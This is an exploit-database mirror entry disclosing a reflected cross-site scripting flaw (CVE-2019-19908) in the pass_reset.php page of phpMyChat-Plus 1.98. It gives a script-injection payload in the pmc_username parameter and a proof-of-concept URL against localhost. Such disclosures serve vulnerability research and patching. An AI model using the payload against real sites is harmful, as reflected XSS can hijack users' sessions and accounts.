exploit-db-mirror/exploits/php/webapps/47798.txt
Offensive Security e3e102da5b DB: 2019-12-21
4 changes to exploits/shellcodes

Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)

FreeSWITCH 1.10.1 - Command Execution

phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
2019-12-21 05:01:57 +00:00

17 lines
No EOL
564 B
Text

# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Date: 2019-12-19
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://ciprianmp.com/latest/
# Download: https://sourceforge.net/projects/phpmychat/
# Tested On: Linux & Mac
# Version: 1.98
# CVE: CVE-2019-19908
Description:
The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS
Payload:
"><script>alert('xss')</script>
Vulnerable URL:
http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>